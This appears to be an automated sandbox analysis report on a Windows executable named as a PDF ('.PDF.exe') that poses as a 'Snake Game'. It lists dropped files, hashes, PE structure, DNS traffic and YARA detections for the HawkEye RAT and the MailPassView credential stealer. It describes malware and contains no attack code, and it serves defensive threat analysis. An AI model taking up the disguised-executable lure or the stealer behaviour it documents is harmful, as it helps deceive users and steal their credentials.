                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.9.2.9.4.1.0.9.1.1.4.0.7.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.9.2.9.4.1.1.0.3.1.7.1.9.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.d.e.a.9.d.1.-.6.f.0.4.-.4.2.8.b.-.9.b.7.2.-.7.d.1.1.7.3.0.7.d.6.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.7.4.c.3.7.e.-.b.e.f.5.-.4.5.b.1.-.8.d.0.c.-.7.a.f.0.5.a.f.f.2.7.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.c.-.0.0.0.1.-.0.0.1.7.-.7.6.a.0.-.3.8.c.f.9.3.1.0.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.8.7.d.9.a.6.e.c.3.f.2.6.2.e.8.b.7.1.d.1.9.a.c.1.5.7.c.2.a.2.8.6.a.0.f.5.9.d.d.!.v.b.c.
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER89A1.tmp.dmp
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Thu Mar 4 01:15:09 2021, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):37050
                                                            Entropy (8bit):2.0647926238959364
                                                            Encrypted:false
                                                            SSDEEP:192:mrNMAoQcWWXDPJk2Y+CVRd5AveQFkJQHN:mxLD1MDPJNYpVRYVFtN
                                                            MD5:A2F4BCACEA6B487455496EC0281A8FE7
                                                            SHA1:4AE0F67C760C25F5A15ADB46BC37FECC07E2B965
                                                            SHA-256:29A4BB5E95C231AB869D21CC52C38715C301C284C929A6373ECA620166B6370F
                                                            SHA-512:C801CDEE2BD1999FE06174664428CEB3C6C898F1D4782F3F6D327D5BA3497297CC4F079337CAD4B07D3D14FE8A462CDC8681F9A5C69508C391A1E8E3091CA4A2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: MDMP....... ........4@`...................U...........B..............GenuineIntelW...........T.......L....4@`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BF4.tmp.WERInternalMetadata.xml
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8344
                                                            Entropy (8bit):3.703927038018695
                                                            Encrypted:false
                                                            SSDEEP:192:Rrl7r3GLNimG6A76Yqy6fFgmf5BSMCprY89bof7wsftv4m:RrlsNi36O6Yn69gmfPSRovfP
                                                            MD5:9945E1B9A8D937B18F9DC31E975F1215
                                                            SHA1:D61DCA56AAB3B6A1EE3B673D21BFA85086BDECAD
                                                            SHA-256:0524E26D1CAA772616E33EBE260F28969494A6005A7ECECF6C563FCFCDBEB0EE
                                                            SHA-512:62A8E6240F47C58371DF1B8E99872777F0C9B6832AAE413A9F7FEED95CF45E9BBC91D4934372DD7C587392E54A576D2FF5A49112D950B42889DBDA386BDE76CB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.3.2.<./.P.i.d.>.......
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8B.tmp.xml
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4643
                                                            Entropy (8bit):4.480489970942812
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwSD8zs8iJgtWI9q0WSC8Bg8fm8M4JlEZFqXK+q8VUwlMSHOd:uITfh9tSNTJauXKJwlTHOd
                                                            MD5:9CCE89CAAB7F11B1DC13431E291B8398
                                                            SHA1:365BDCF2293020750BFFB7F152B6834BE896D161
                                                            SHA-256:DEF6B8F3897C80489FA0764A912542D8A4340DCB5ED74E6FB6115CC0C3550F1B
                                                            SHA-512:1E2ED9E04CE0E1FA1900BE7C60346E40A1D089A02DC0E97DF8434657067F4185092A361EFE2FCDDD794CFCD028326A264217C1C92E6954EB115731B52951CFEB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="886225" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5O857649056366403032021.PDF.exe.log
                                                            Process:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1314
                                                            Entropy (8bit):5.350128552078965
                                                            Encrypted:false
                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                            C:\Users\user\AppData\Roaming\pid.txt
                                                            Process:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):0.8112781244591328
                                                            Encrypted:false
                                                            SSDEEP:3:E3n:E3n
                                                            MD5:587B7B833034299FDD5F4B10E7DC9FCA
                                                            SHA1:4B9F94F92A6FFAEE7BF14533AE679C1D396EBBB7
                                                            SHA-256:739B312AE914CFC44AB85100D93F3BA28C22DFE7FBBD4CEE9072C19A11D87411
                                                            SHA-512:767B4ACB5EAA5C81E7810C3571818BA44BF35934991D46D80B3AAF4F33F73B313861D5AE58F0BFFBA2DE7FAD455D62923D4EDC5DC1AEAF30B12C652D7EC96223
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: 5444
                                                            C:\Users\user\AppData\Roaming\pidloc.txt
                                                            Process:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):54
                                                            Entropy (8bit):4.712949307598833
                                                            Encrypted:false
                                                            SSDEEP:3:oNWXp5vQqhWfR88XukA:oNWXpFQSWxDA
                                                            MD5:CCDB3AB1EE56552E9E8D0D47D18B1C78
                                                            SHA1:8B56F93FB2AC5E73F461E8742C26062E9B82B22D
                                                            SHA-256:A6884B2FA05A5C130256A76EC80C1B88F854A967A4B1DC966774A94DB0C0A4AB
                                                            SHA-512:C6E1F1815014566DDF8AA8973431B85A713E94D7008A2B403F9A4995F72FA89C55EBBF740F1860F6E115219460621291A7255EE6D250592AD27A3CE8FC7C6C4D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.637398703052732
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                            File name:5O857649056366403032021.PDF.exe
                                                            File size:1057280
                                                            MD5:a67f05d542bcee462ecc03ae4d8195d6
                                                            SHA1:eeb590aaa3c47851ae6f678c29aec2ba1b54df8f
                                                            SHA256:1e96629ba4b537932150cc517455a0cfddcb7c35a4a0998d107643dc887b31c3
                                                            SHA512:270f31f9481dd1259a890de29b22c59adc21fbeaad17ff3c22ed739214d3ea490b086dd0ec8b92fa9f1e9d3cbda5e3ca97406d2d4f18e4a87ba09e0ac83deaa5
                                                            SSDEEP:24576:c4ZIZrK3Orlv80WSRbvuvDzAolFCdNtIEBIQxBwqA:3Zd3xSRK4olkdQE
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.>`..............P.............N7... ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x50374e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x603EE278 [Wed Mar 3 01:12:24 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1037000x4b.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1040000x600.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1060000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x1017540x101800False0.826626972087data7.64304839327IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x1040000x6000x600False0.434244791667data4.20816553114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1060000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_VERSION0x1040900x370data
                                                            RT_MANIFEST0x1044100x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyrightCopyright 2020 - 2021
                                                            Assembly Version1.0.0.0
                                                            InternalNameNotSupportedException.exe
                                                            FileVersion1.0.0.0
                                                            CompanyNameAgario
                                                            LegalTrademarks
                                                            Comments
                                                            ProductNameSnake Game
                                                            ProductVersion1.0.0.0
                                                            FileDescriptionSnake Game
                                                            OriginalFilenameNotSupportedException.exe

                                                            Network Behavior

                                                            Network Port Distribution

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 3, 2021 17:14:33.214509964 CET4987353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:33.260349989 CET53498738.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:33.709773064 CET5319653192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:33.758582115 CET53531968.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:33.914417982 CET5677753192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:33.960149050 CET53567778.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:34.240216017 CET5864353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:34.321981907 CET53586438.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:34.408603907 CET6098553192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:34.456425905 CET53609858.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:35.405508041 CET5020053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:35.451615095 CET53502008.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:36.435086966 CET5128153192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:36.491914988 CET53512818.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:37.438740969 CET4919953192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:37.483431101 CET5062053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:37.484256983 CET53491998.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:37.543839931 CET53506208.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:39.445708990 CET6493853192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:39.491714954 CET53649388.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:40.667319059 CET6015253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:40.716125965 CET53601528.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:41.989645958 CET5754453192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:42.037026882 CET53575448.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:14:58.696459055 CET5598453192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:14:58.753180027 CET53559848.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:01.106949091 CET6418553192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:01.152890921 CET53641858.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:01.163681030 CET6511053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:01.214071035 CET53651108.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:02.767374039 CET5836153192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:02.813678980 CET53583618.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:04.194222927 CET6349253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:04.240705967 CET53634928.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:05.250946045 CET6083153192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:05.299650908 CET53608318.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:06.904519081 CET6010053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:06.950258017 CET53601008.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:08.590962887 CET5319553192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:08.636954069 CET53531958.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:09.509015083 CET5014153192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:09.568008900 CET53501418.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:10.655904055 CET5302353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:10.701605082 CET53530238.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:11.877171993 CET4956353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:11.922899961 CET53495638.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:12.121400118 CET5135253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:12.171503067 CET53513528.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:13.808252096 CET5934953192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:13.857146978 CET53593498.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:14.778565884 CET5708453192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:14.824393034 CET53570848.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:20.228868008 CET5882353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:20.274827003 CET53588238.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:29.668606043 CET5756853192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:29.716171026 CET53575688.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:29.807586908 CET5054053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:29.863745928 CET53505408.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:15:48.932668924 CET5436653192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:15:48.981421947 CET53543668.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:16:01.827075958 CET5303453192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:16:01.872833967 CET53530348.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:16:20.140646935 CET5776253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:16:20.196206093 CET53577628.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:16:53.634814978 CET5543553192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:16:53.682331085 CET53554358.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:12.506916046 CET5071353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:12.556099892 CET53507138.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:30.583940029 CET5613253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:30.643706083 CET53561328.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:32.108513117 CET5898753192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:32.167363882 CET53589878.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:32.696746111 CET5657953192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:32.742829084 CET53565798.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:33.303934097 CET6063353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:33.375474930 CET53606338.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:34.003638983 CET6129253192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:34.068038940 CET53612928.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:38.208647966 CET6361953192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:38.269738913 CET53636198.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:38.780533075 CET6493853192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:38.835195065 CET53649388.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:39.593573093 CET6194653192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:39.642622948 CET53619468.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:40.453255892 CET6491053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:40.512172937 CET53649108.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:41.080837965 CET5212353192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:41.153503895 CET53521238.8.8.8192.168.2.3
                                                            Mar 3, 2021 17:17:54.798070908 CET5613053192.168.2.38.8.8.8
                                                            Mar 3, 2021 17:17:54.860306978 CET53561308.8.8.8192.168.2.3

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Mar 3, 2021 17:15:01.163681030 CET192.168.2.38.8.8.80x589cStandard query (0)203.215.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Mar 3, 2021 17:15:01.214071035 CET8.8.8.8192.168.2.30x589cName error (3)203.215.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)

                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:17:14:41
                                                            Start date:03/03/2021
                                                            Path:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\5O857649056366403032021.PDF.exe'
                                                            Imagebase:0x340000
                                                            File size:1057280 bytes
                                                            MD5 hash:A67F05D542BCEE462ECC03AE4D8195D6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
